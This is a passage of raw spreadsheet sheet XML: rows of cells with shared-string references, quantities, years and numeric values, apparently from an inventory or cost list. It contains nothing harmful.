      <c r="B395" s="11">
        <v>383</v>
      </c>
      <c r="C395" s="11"/>
      <c r="D395" s="9" t="s">
        <v>3733</v>
      </c>
      <c r="E395" s="9" t="s">
        <v>1288</v>
      </c>
      <c r="F395" s="9"/>
      <c r="G395" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H395" s="16">
        <v>1</v>
      </c>
      <c r="J395" s="131"/>
      <c r="K395" s="99">
        <v>48000</v>
      </c>
      <c r="L395" s="9"/>
    </row>
    <row r="396" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A396" s="93"/>
      <c r="B396" s="127" t="s">
        <v>1628</v>
      </c>
      <c r="C396" s="128"/>
      <c r="D396" s="129"/>
      <c r="E396" s="9"/>
      <c r="F396" s="9"/>
      <c r="G396" s="16"/>
      <c r="H396" s="16"/>
      <c r="J396" s="131"/>
      <c r="K396" s="99">
        <v>0</v>
      </c>
      <c r="L396" s="9"/>
    </row>
    <row r="397" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A397" s="93"/>
      <c r="B397" s="11">
        <v>384</v>
      </c>
      <c r="C397" s="11"/>
      <c r="D397" s="9" t="s">
        <v>331</v>
      </c>
      <c r="E397" s="9" t="s">
        <v>3734</v>
      </c>
      <c r="F397" s="9"/>
      <c r="G397" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H397" s="16">
        <v>1</v>
      </c>
      <c r="J397" s="131"/>
      <c r="K397" s="99">
        <v>11200</v>
      </c>
      <c r="L397" s="9" t="s">
        <v>3735</v>
      </c>
    </row>
    <row r="398" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A398" s="93"/>
      <c r="B398" s="11">
        <v>385</v>
      </c>
      <c r="C398" s="11"/>
      <c r="D398" s="9" t="s">
        <v>491</v>
      </c>
      <c r="E398" s="9" t="s">
        <v>3736</v>
      </c>
      <c r="F398" s="9" t="s">
        <v>1154</v>
      </c>
      <c r="G398" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H398" s="16">
        <v>2</v>
      </c>
      <c r="I398" s="88">
        <v>2003</v>
      </c>
      <c r="J398" s="9"/>
      <c r="K398" s="99">
        <v>200</v>
      </c>
      <c r="L398" s="9"/>
    </row>
    <row r="399" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A399" s="93"/>
      <c r="B399" s="11">
        <v>386</v>
      </c>
      <c r="C399" s="11"/>
      <c r="D399" s="9" t="s">
        <v>331</v>
      </c>
      <c r="E399" s="9" t="s">
        <v>3737</v>
      </c>
      <c r="F399" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="G399" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H399" s="16">
        <v>1</v>
      </c>
      <c r="I399" s="88">
        <v>2003</v>
      </c>
      <c r="J399" s="9"/>
      <c r="K399" s="99">
        <v>3120</v>
      </c>
      <c r="L399" s="9"/>
    </row>
    <row r="400" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A400" s="93"/>
      <c r="B400" s="11">
        <v>387</v>
      </c>
      <c r="C400" s="11"/>
      <c r="D400" s="9" t="s">
        <v>3738</v>
      </c>
      <c r="E400" s="9" t="s">
        <v>3739</v>
      </c>
      <c r="F400" s="9"/>
      <c r="G400" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H400" s="16">
        <v>1</v>
      </c>
      <c r="J400" s="9"/>
      <c r="K400" s="99">
        <v>2400</v>
      </c>
      <c r="L400" s="9"/>
    </row>
    <row r="401" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A401" s="93"/>
      <c r="B401" s="11">
        <v>388</v>
      </c>
      <c r="C401" s="11"/>
      <c r="D401" s="9" t="s">
        <v>331</v>
      </c>
      <c r="E401" s="9" t="s">
        <v>3734</v>
      </c>
      <c r="F401" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="G401" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H401" s="16">
        <v>1</v>
      </c>
      <c r="I401" s="88">
        <v>2003</v>
      </c>
      <c r="J401" s="9"/>
      <c r="K401" s="99">
        <v>4800</v>
      </c>
      <c r="L401" s="9"/>
    </row>
    <row r="402" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A402" s="93"/>
      <c r="B402" s="11">
        <v>389</v>
      </c>
      <c r="C402" s="11"/>
      <c r="D402" s="9" t="s">
        <v>3740</v>
      </c>
      <c r="E402" s="9" t="s">
        <v>3741</v>
      </c>
      <c r="F402" s="9"/>
      <c r="G402" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H402" s="16">
        <v>1</v>
      </c>
      <c r="J402" s="9"/>
      <c r="K402" s="99">
        <v>2400</v>
      </c>
      <c r="L402" s="9"/>
    </row>
    <row r="403" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A403" s="93"/>
      <c r="B403" s="11">
        <v>390</v>
      </c>
      <c r="C403" s="11"/>
      <c r="D403" s="9" t="s">
        <v>2889</v>
      </c>
      <c r="E403" s="9" t="s">
        <v>3742</v>
      </c>
      <c r="F403" s="9"/>
      <c r="G403" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H403" s="16">
        <v>1</v>
      </c>
      <c r="J403" s="9"/>
      <c r="K403" s="99">
        <v>600</v>
      </c>
      <c r="L403" s="9"/>
    </row>
    <row r="404" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A404" s="93"/>
      <c r="B404" s="11">
        <v>391</v>
      </c>
      <c r="C404" s="11"/>
      <c r="D404" s="9" t="s">
        <v>1173</v>
      </c>
      <c r="E404" s="9" t="s">
        <v>3743</v>
      </c>
      <c r="F404" s="9" t="s">
        <v>1895</v>
      </c>
      <c r="G404" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H404" s="16">
        <v>1</v>
      </c>
      <c r="I404" s="88">
        <v>1998</v>
      </c>
      <c r="J404" s="9"/>
      <c r="K404" s="99">
        <v>200</v>
      </c>
      <c r="L404" s="9"/>
    </row>
    <row r="405" customHeight="1" spans="1:12">
      <c r="A405" s="93"/>
      <c r="B405" s="127" t="s">
        <v>3744</v>
      </c>
      <c r="C405" s="128"/>
      <c r="D405" s="129"/>
      <c r="H405" s="16"/>
      <c r="I405" s="88"/>
      <c r="K405" s="99">
        <v>0</v>
      </c>
      <c r="L405" s="9"/>
    </row>
    <row r="406" customHeight="1" spans="1:12">
      <c r="A406" s="93"/>
      <c r="B406" s="11">
        <v>392</v>
      </c>
      <c r="C406" s="11"/>
      <c r="D406" s="9" t="s">
        <v>3745</v>
      </c>
      <c r="E406" s="9" t="s">
        <v>3741</v>
      </c>
      <c r="G406" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H406" s="16">
        <v>1</v>
      </c>
      <c r="I406" s="88"/>
      <c r="K406" s="99">
        <v>1200</v>
      </c>
      <c r="L406" s="9"/>
    </row>
    <row r="407" customHeight="1" spans="1:12">
      <c r="A407" s="93"/>
      <c r="B407" s="11">
        <v>393</v>
      </c>
      <c r="C407" s="11"/>
      <c r="D407" s="9" t="s">
        <v>3746</v>
      </c>
      <c r="E407" s="9" t="s">
        <v>3747</v>
      </c>
      <c r="G407" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H407" s="16">
        <v>1</v>
      </c>
      <c r="I407" s="88">
        <v>2009</v>
      </c>
      <c r="K407" s="99">
        <v>9360</v>
      </c>
      <c r="L407" s="9"/>
    </row>
    <row r="408" customHeight="1" spans="1:12">
      <c r="A408" s="93"/>
      <c r="B408" s="11">
        <v>394</v>
      </c>
      <c r="C408" s="11"/>
      <c r="D408" s="9" t="s">
        <v>3748</v>
      </c>
      <c r="E408" s="9" t="s">
        <v>3749</v>
      </c>
      <c r="G408" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H408" s="16">
        <v>1</v>
      </c>
      <c r="I408" s="88"/>
      <c r="K408" s="99">
        <v>1200</v>
      </c>
      <c r="L408" s="9"/>
    </row>
    <row r="409" customHeight="1" spans="1:12">
      <c r="A409" s="93"/>
      <c r="B409" s="11">
        <v>395</v>
      </c>
      <c r="C409" s="11"/>
      <c r="D409" s="10" t="s">
        <v>3750</v>
      </c>
      <c r="E409" s="10" t="s">
        <v>3751</v>
      </c>
      <c r="G409" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H409" s="88">
        <v>1</v>
      </c>
      <c r="I409" s="88"/>
      <c r="J409" s="130"/>
      <c r="K409" s="99">
        <v>600</v>
      </c>
      <c r="L409" s="9"/>
    </row>
    <row r="410" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A410" s="93"/>
      <c r="B410" s="11">
        <v>396</v>
      </c>
      <c r="C410" s="11"/>
      <c r="D410" s="9" t="s">
        <v>3752</v>
      </c>
      <c r="E410" s="9" t="s">
        <v>3753</v>
      </c>
      <c r="F410" s="9"/>
      <c r="G410" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H410" s="16">
        <v>1</v>
      </c>
      <c r="J410" s="131"/>
      <c r="K410" s="99">
        <v>3600</v>
      </c>
      <c r="L410" s="9"/>
    </row>
    <row r="411" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A411" s="93"/>
      <c r="B411" s="11">
        <v>397</v>
      </c>
      <c r="C411" s="11"/>
      <c r="D411" s="9" t="s">
        <v>3754</v>
      </c>
      <c r="E411" s="9"/>
      <c r="F411" s="9"/>
      <c r="G411" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H411" s="16">
        <v>1</v>
      </c>
      <c r="J411" s="131"/>
      <c r="K411" s="99">
        <v>400</v>
      </c>
      <c r="L411" s="9"/>
    </row>
    <row r="412" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A412" s="93"/>
      <c r="B412" s="11">
        <v>398</v>
      </c>
      <c r="C412" s="11"/>
      <c r="D412" s="10" t="s">
        <v>3011</v>
      </c>
      <c r="E412" s="10" t="s">
        <v>3755</v>
      </c>
      <c r="F412" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G412" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H412" s="16">
        <v>1</v>
      </c>
      <c r="J412" s="131"/>
      <c r="K412" s="99">
        <v>240</v>
      </c>
      <c r="L412" s="9"/>
    </row>
    <row r="413" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A413" s="93"/>
      <c r="B413" s="11">
        <v>399</v>
      </c>
      <c r="C413" s="11"/>
      <c r="D413" s="9" t="s">
        <v>3756</v>
      </c>
      <c r="E413" s="9" t="s">
        <v>3757</v>
      </c>
      <c r="F413" s="9"/>
      <c r="G413" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H413" s="16">
        <v>1</v>
      </c>
      <c r="J413" s="9"/>
      <c r="K413" s="99">
        <v>12000</v>
      </c>
      <c r="L413" s="9"/>
    </row>
    <row r="414" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A414" s="93"/>
      <c r="B414" s="11">
        <v>400</v>
      </c>
      <c r="C414" s="11"/>
      <c r="D414" s="9" t="s">
        <v>3758</v>
      </c>
      <c r="E414" s="9" t="s">
        <v>3759</v>
      </c>
      <c r="F414" s="9"/>
      <c r="G414" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H414" s="16">
        <v>1</v>
      </c>
      <c r="J414" s="9"/>
      <c r="K414" s="99">
        <v>9600</v>
      </c>
      <c r="L414" s="9"/>
    </row>
    <row r="415" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A415" s="93"/>
      <c r="B415" s="11">
        <v>401</v>
      </c>
      <c r="C415" s="11"/>
      <c r="D415" s="9" t="s">
        <v>3760</v>
      </c>
      <c r="E415" s="9" t="s">
        <v>3761</v>
      </c>
      <c r="F415" s="9"/>
      <c r="G415" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H415" s="16">
        <v>1</v>
      </c>
      <c r="I415" s="88">
        <v>2015</v>
      </c>
      <c r="J415" s="9"/>
      <c r="K415" s="99">
        <v>5040</v>
      </c>
      <c r="L415" s="9"/>
    </row>
    <row r="416" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A416" s="93"/>
      <c r="B416" s="11">
        <v>402</v>
      </c>
      <c r="C416" s="11"/>
      <c r="D416" s="9" t="s">
        <v>3762</v>
      </c>
      <c r="E416" s="9" t="s">
        <v>3763</v>
      </c>
      <c r="F416" s="9"/>
      <c r="G416" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H416" s="16">
        <v>1</v>
      </c>
      <c r="I416" s="88">
        <v>2009</v>
      </c>
      <c r="J416" s="9"/>
      <c r="K416" s="99">
        <v>1680</v>
      </c>
      <c r="L416" s="9"/>
    </row>
    <row r="417" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A417" s="93"/>
      <c r="B417" s="11">
        <v>403</v>
      </c>
      <c r="C417" s="11"/>
      <c r="D417" s="9" t="s">
        <v>952</v>
      </c>
      <c r="E417" s="9" t="s">
        <v>3764</v>
      </c>
      <c r="F417" s="9"/>
      <c r="G417" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H417" s="16">
        <v>1</v>
      </c>
      <c r="I417" s="88">
        <v>2009</v>
      </c>
      <c r="J417" s="9"/>
      <c r="K417" s="99">
        <v>5040</v>
      </c>
      <c r="L417" s="9"/>
    </row>
    <row r="418" customHeight="1" spans="1:12">
      <c r="A418" s="93"/>
      <c r="B418" s="11">
        <v>404</v>
      </c>
      <c r="C418" s="11"/>
      <c r="D418" s="9" t="s">
        <v>3765</v>
      </c>
      <c r="E418" s="9" t="s">
        <v>3694</v>
      </c>
      <c r="G418" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H418" s="16">
        <v>1</v>
      </c>
      <c r="I418" s="88"/>
      <c r="K418" s="99">
        <v>600</v>
      </c>
      <c r="L418" s="9"/>
    </row>
    <row r="419" customHeight="1" spans="1:12">
      <c r="A419" s="93"/>
      <c r="B419" s="11">
        <v>405</v>
      </c>
      <c r="C419" s="11"/>
      <c r="D419" s="9" t="s">
        <v>3766</v>
      </c>
      <c r="E419" s="9" t="s">
        <v>3767</v>
      </c>
      <c r="G419" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H419" s="16">
        <v>1</v>
      </c>
      <c r="I419" s="88"/>
      <c r="K419" s="99">
        <v>3200</v>
      </c>
      <c r="L419" s="9"/>
    </row>
    <row r="420" customHeight="1" spans="1:12">
      <c r="A420" s="93"/>
      <c r="B420" s="11">
        <v>406</v>
      </c>
      <c r="C420" s="11"/>
      <c r="D420" s="9" t="s">
        <v>3768</v>
      </c>
      <c r="E420" s="9" t="s">
        <v>3769</v>
      </c>
      <c r="G420" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H420" s="16">
        <v>1</v>
      </c>
      <c r="I420" s="88"/>
      <c r="K420" s="99">
        <v>1600</v>
      </c>
      <c r="L420" s="9"/>
    </row>
    <row r="421" customHeight="1" spans="1:12">
      <c r="A421" s="93"/>
      <c r="B421" s="127" t="s">
        <v>3770</v>
      </c>
      <c r="C421" s="128"/>
      <c r="D421" s="129"/>
      <c r="H421" s="16"/>
      <c r="I421" s="88"/>
      <c r="K421" s="99">
        <v>0</v>
      </c>
      <c r="L421" s="9"/>
    </row>
    <row r="422" customHeight="1" spans="1:12">
      <c r="A422" s="93"/>
      <c r="B422" s="11">
        <v>407</v>
      </c>
      <c r="C422" s="11"/>
      <c r="D422" s="10" t="s">
        <v>3771</v>
      </c>
      <c r="E422" s="10" t="s">
        <v>3772</v>
      </c>
      <c r="F422" s="9" t="s">
        <v>499</v>
      </c>
      <c r="G422" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H422" s="88">
        <v>1</v>
      </c>
      <c r="I422" s="88">
        <v>2006</v>
      </c>
      <c r="J422" s="130"/>
      <c r="K422" s="99">
        <v>8400</v>
      </c>
      <c r="L422" s="9"/>
    </row>
    <row r="423" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A423" s="93"/>
      <c r="B423" s="11">
        <v>408</v>
      </c>
      <c r="C423" s="11"/>
      <c r="D423" s="9" t="s">
        <v>3011</v>
      </c>
      <c r="E423" s="9" t="s">
        <v>3773</v>
      </c>
      <c r="F423" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G423" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H423" s="16">
        <v>4</v>
      </c>
      <c r="J423" s="131"/>
      <c r="K423" s="99">
        <v>1200</v>
      </c>
      <c r="L423" s="9"/>
    </row>
    <row r="424" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A424" s="93"/>
      <c r="B424" s="11">
        <v>409</v>
      </c>
      <c r="C424" s="11"/>
      <c r="D424" s="9" t="s">
        <v>2787</v>
      </c>
      <c r="E424" s="9" t="s">
        <v>3774</v>
      </c>
      <c r="F424" s="9"/>
      <c r="G424" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H424" s="16">
        <v>2</v>
      </c>
      <c r="J424" s="131"/>
      <c r="K424" s="99">
        <v>2400</v>
      </c>
      <c r="L424" s="9"/>
    </row>
    <row r="425" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A425" s="93"/>
      <c r="B425" s="11">
        <v>410</v>
      </c>
      <c r="C425" s="11"/>
      <c r="D425" s="9" t="s">
        <v>3775</v>
      </c>
      <c r="E425" s="9"/>
      <c r="F425" s="9"/>
      <c r="G425" s="16" t="s">
        <v>3776</v>
      </c>
      <c r="H425" s="16">
        <v>2</v>
      </c>
      <c r="J425" s="131"/>
      <c r="K425" s="99">
        <v>3600</v>
      </c>
      <c r="L425" s="9"/>
    </row>
    <row r="426" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A426" s="93"/>
      <c r="B426" s="11">
        <v>411</v>
      </c>
      <c r="C426" s="11"/>
      <c r="D426" s="9" t="s">
        <v>3777</v>
      </c>
      <c r="E426" s="9" t="s">
        <v>3778</v>
      </c>
      <c r="F426" s="9"/>
      <c r="G426" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H426" s="16">
        <v>2</v>
      </c>
      <c r="J426" s="9"/>
      <c r="K426" s="99">
        <v>3600</v>
      </c>
      <c r="L426" s="9"/>
    </row>
    <row r="427" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A427" s="93"/>
      <c r="B427" s="11">
        <v>412</v>
      </c>
      <c r="C427" s="11"/>
      <c r="D427" s="9" t="s">
        <v>3779</v>
      </c>
      <c r="E427" s="9" t="s">
        <v>3780</v>
      </c>
      <c r="F427" s="9"/>
      <c r="G427" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H427" s="16">
        <v>2</v>
      </c>
      <c r="J427" s="9"/>
      <c r="K427" s="99">
        <v>3600</v>
      </c>
      <c r="L427" s="9"/>
    </row>
    <row r="428" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A428" s="93"/>
      <c r="B428" s="11">
        <v>413</v>
      </c>
      <c r="C428" s="11"/>
      <c r="D428" s="9" t="s">
        <v>3781</v>
      </c>
      <c r="E428" s="9" t="s">
        <v>3782</v>
      </c>
      <c r="F428" s="9"/>
      <c r="G428" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H428" s="16">
        <v>1</v>
      </c>
      <c r="I428" s="88">
        <v>2007</v>
      </c>
      <c r="J428" s="9"/>
      <c r="K428" s="99">
        <v>156000</v>
      </c>
      <c r="L428" s="9"/>
    </row>
    <row r="429" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A429" s="93"/>
      <c r="B429" s="11">
        <v>414</v>
      </c>
      <c r="C429" s="11"/>
      <c r="D429" s="9" t="s">
        <v>3783</v>
      </c>
      <c r="E429" s="9"/>
      <c r="F429" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G429" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H429" s="16">
        <v>1</v>
      </c>
      <c r="J429" s="9"/>
      <c r="K429" s="99">
        <v>480</v>
      </c>
      <c r="L429" s="9"/>
    </row>
    <row r="430" s="123" customFormat="1" customHeight="1" spans="1:12">
      <c r="A430" s="93"/>
      <c r="B430" s="11">
        <v>415</v>
      </c>
      <c r="C430" s="11"/>
      <c r="D430" s="9" t="s">
        <v>2987</v>
      </c>
      <c r="E430" s="9" t="s">
        <v>3784</v>
      </c>
      <c r="F430" s="9"/>
      <c r="G430" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H430" s="16">
        <v>2</v>
      </c>
      <c r="I430" s="88"/>
      <c r="J430" s="9"/>
      <c r="K430" s="99">
        <v>4800</v>
      </c>
      <c r="L430" s="9"/>
    </row>
    <row r="431" customHeight="1" spans="1:12">
      <c r="A431" s="93"/>
      <c r="B431" s="11">
        <v>416</v>
      </c>
      <c r="C431" s="11"/>
      <c r="D431" s="9" t="s">
        <v>3785</v>
      </c>
      <c r="E431" s="9" t="s">
        <v>3786</v>
      </c>
      <c r="G431" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H431" s="16">
        <v>5</v>
      </c>
      <c r="I431" s="88"/>
      <c r="K431" s="99">
        <v>9600</v>
      </c>
      <c r="L431" s="9"/>
    </row>
    <row r="432" customHeight="1" spans="1:12">
      <c r="A432" s="93"/>
      <c r="B432" s="11">
        <v>417</v>
      </c>
      <c r="C432" s="11"/>
      <c r="D432" s="9" t="s">
        <v>3787</v>
      </c>
      <c r="E432" s="9" t="s">
        <v>3788</v>
      </c>
      <c r="G432" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H432" s="16">
        <v>1</v>
      </c>
      <c r="I432" s="88"/>
      <c r="K432" s="99">
        <v>1200</v>
      </c>
      <c r="L432" s="9"/>
    </row>
    <row r="433" customHeight="1" spans="1:12">
      <c r="A433" s="93"/>
      <c r="B433" s="11">
        <v>418</v>
      </c>
      <c r="C433" s="11"/>
      <c r="D433" s="9" t="s">
        <v>3777</v>
      </c>
      <c r="E433" s="9" t="s">
        <v>3789</v>
      </c>
      <c r="G433" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H433" s="16">
        <v>1</v>
      </c>
      <c r="I433" s="88"/>
      <c r="K433" s="99">
        <v>1440</v>
      </c>
      <c r="L433" s="9"/>
    </row>
    <row r="434" customHeight="1" spans="1:12">
      <c r="A434" s="93"/>
      <c r="B434" s="127" t="s">
        <v>3790</v>
      </c>
      <c r="C434" s="128"/>
      <c r="D434" s="129"/>
      <c r="E434" s="132"/>
      <c r="H434" s="16"/>
      <c r="I434" s="88"/>
      <c r="K434" s="99">
        <v>0</v>
      </c>
      <c r="L434" s="9"/>
    </row>
    <row r="435" customHeight="1" spans="1:12">
      <c r="A435" s="93"/>
      <c r="B435" s="11">
        <v>419</v>
      </c>
      <c r="C435" s="11"/>
      <c r="D435" s="10" t="s">
        <v>3791</v>
      </c>
      <c r="E435" s="10"/>
      <c r="G435" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H435" s="88">
        <v>2</v>
      </c>
      <c r="I435" s="88"/>
      <c r="J435" s="130"/>
      <c r="K435" s="99">
        <v>9600</v>
      </c>
      <c r="L435" s="9"/>
    </row>
    <row r="436" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A436" s="93"/>
      <c r="B436" s="11">
        <v>420</v>
      </c>
      <c r="C436" s="11"/>
      <c r="D436" s="9" t="s">
        <v>3792</v>
      </c>
      <c r="E436" s="9" t="s">
        <v>3793</v>
      </c>
      <c r="F436" s="9"/>
      <c r="G436" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H436" s="16">
        <v>2</v>
      </c>
      <c r="J436" s="131"/>
      <c r="K436" s="99">
        <v>60000</v>
      </c>
      <c r="L436" s="9"/>
    </row>
    <row r="437" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A437" s="93"/>
      <c r="B437" s="11">
        <v>421</v>
      </c>
      <c r="C437" s="11"/>
      <c r="D437" s="9" t="s">
        <v>3794</v>
      </c>
      <c r="E437" s="9" t="s">
        <v>3795</v>
      </c>
      <c r="F437" s="9" t="s">
        <v>3796</v>
      </c>
      <c r="G437" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H437" s="16">
        <v>1</v>
      </c>
      <c r="I437" s="88">
        <v>2015</v>
      </c>
      <c r="J437" s="131"/>
      <c r="K437" s="99">
        <v>5040</v>
      </c>
      <c r="L437" s="9"/>
    </row>
    <row r="438" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A438" s="93"/>
      <c r="B438" s="11">
        <v>422</v>
      </c>
      <c r="C438" s="11"/>
      <c r="D438" s="9" t="s">
        <v>3721</v>
      </c>
      <c r="E438" s="9" t="s">
        <v>3797</v>
      </c>
      <c r="F438" s="9"/>
      <c r="G438" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H438" s="16">
        <v>1</v>
      </c>
      <c r="J438" s="131"/>
      <c r="K438" s="99">
        <v>600</v>
      </c>
      <c r="L438" s="9"/>
    </row>
    <row r="439" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A439" s="93"/>
      <c r="B439" s="127" t="s">
        <v>3798</v>
      </c>
      <c r="C439" s="128"/>
      <c r="D439" s="129"/>
      <c r="E439" s="132"/>
      <c r="F439" s="9"/>
      <c r="G439" s="16"/>
      <c r="H439" s="16"/>
      <c r="J439" s="9"/>
      <c r="K439" s="99">
        <v>0</v>
      </c>
      <c r="L439" s="9"/>
    </row>
    <row r="440" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A440" s="93"/>
      <c r="B440" s="11">
        <v>423</v>
      </c>
      <c r="C440" s="11"/>
      <c r="D440" s="9" t="s">
        <v>3765</v>
      </c>
      <c r="E440" s="9" t="s">
        <v>3799</v>
      </c>
      <c r="F440" s="9"/>
      <c r="G440" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H440" s="16">
        <v>2</v>
      </c>
      <c r="J440" s="9"/>
      <c r="K440" s="99">
        <v>1200</v>
      </c>
      <c r="L440" s="9"/>
    </row>
    <row r="441" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A441" s="93"/>
      <c r="B441" s="11">
        <v>424</v>
      </c>
      <c r="C441" s="11"/>
      <c r="D441" s="9" t="s">
        <v>3800</v>
      </c>
      <c r="E441" s="9" t="s">
        <v>3801</v>
      </c>
      <c r="F441" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="G441" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H441" s="16">
        <v>1</v>
      </c>
      <c r="I441" s="88">
        <v>2007</v>
      </c>
      <c r="J441" s="9"/>
      <c r="K441" s="99">
        <v>72000</v>
      </c>
      <c r="L441" s="9"/>
    </row>
    <row r="442" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A442" s="93"/>
      <c r="B442" s="127" t="s">
        <v>3802</v>
      </c>
      <c r="C442" s="128"/>
      <c r="D442" s="129"/>
      <c r="E442" s="9"/>
      <c r="F442" s="9"/>
      <c r="G442" s="16"/>
      <c r="H442" s="16"/>
      <c r="J442" s="9"/>
      <c r="K442" s="99">
        <v>0</v>
      </c>
      <c r="L442" s="9"/>
    </row>
    <row r="443" customHeight="1" spans="1:12">
      <c r="A443" s="93"/>
      <c r="B443" s="11">
        <v>425</v>
      </c>
      <c r="C443" s="11"/>
      <c r="D443" s="10" t="s">
        <v>3765</v>
      </c>
      <c r="E443" s="9" t="s">
        <v>3803</v>
      </c>
      <c r="G443" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H443" s="16">
        <v>2</v>
      </c>
      <c r="I443" s="88"/>
      <c r="K443" s="99">
        <v>1200</v>
      </c>
      <c r="L443" s="9"/>
    </row>
    <row r="444" customHeight="1" spans="1:12">
      <c r="A444" s="93"/>
      <c r="B444" s="11">
        <v>426</v>
      </c>
      <c r="C444" s="11"/>
      <c r="D444" s="9" t="s">
        <v>2527</v>
      </c>
      <c r="E444" s="9" t="s">
        <v>3804</v>
      </c>
      <c r="G444" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H444" s="16">
        <v>1</v>
      </c>
      <c r="I444" s="88"/>
      <c r="K444" s="99">
        <v>3000</v>
      </c>
      <c r="L444" s="9"/>
    </row>
    <row r="445" customHeight="1" spans="1:12">
      <c r="A445" s="93"/>
      <c r="B445" s="127" t="s">
        <v>2390</v>
      </c>
      <c r="C445" s="128"/>
      <c r="D445" s="129"/>
      <c r="H445" s="16"/>
      <c r="I445" s="88"/>
      <c r="K445" s="99">
        <v>0</v>
      </c>
      <c r="L445" s="9"/>
    </row>
    <row r="446" customHeight="1" spans="1:12">
      <c r="A446" s="93"/>
      <c r="B446" s="11">
        <v>427</v>
      </c>
      <c r="C446" s="11"/>
      <c r="D446" s="9" t="s">
        <v>3805</v>
      </c>
      <c r="E446" s="9" t="s">
        <v>3806</v>
      </c>
      <c r="G446" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H446" s="16">
        <v>1</v>
      </c>
      <c r="I446" s="88"/>
      <c r="K446" s="99">
        <v>12000</v>
      </c>
      <c r="L446" s="9"/>
    </row>
    <row r="447" customHeight="1" spans="1:12">
      <c r="A447" s="93"/>
      <c r="B447" s="11">
        <v>428</v>
      </c>
      <c r="C447" s="11"/>
      <c r="D447" s="9" t="s">
        <v>3807</v>
      </c>
      <c r="E447" s="9" t="s">
        <v>3808</v>
      </c>
      <c r="G447" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H447" s="88">
        <v>4</v>
      </c>
      <c r="I447" s="88"/>
      <c r="J447" s="130"/>
      <c r="K447" s="99">
        <v>2400</v>
      </c>
      <c r="L447" s="9" t="s">
        <v>3727</v>
      </c>
    </row>
    <row r="448" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A448" s="93"/>
      <c r="B448" s="11">
        <v>429</v>
      </c>
      <c r="C448" s="11"/>
      <c r="D448" s="9" t="s">
        <v>3807</v>
      </c>
      <c r="E448" s="9" t="s">
        <v>3809</v>
      </c>
      <c r="F448" s="9"/>
      <c r="G448" s="16" t="s">
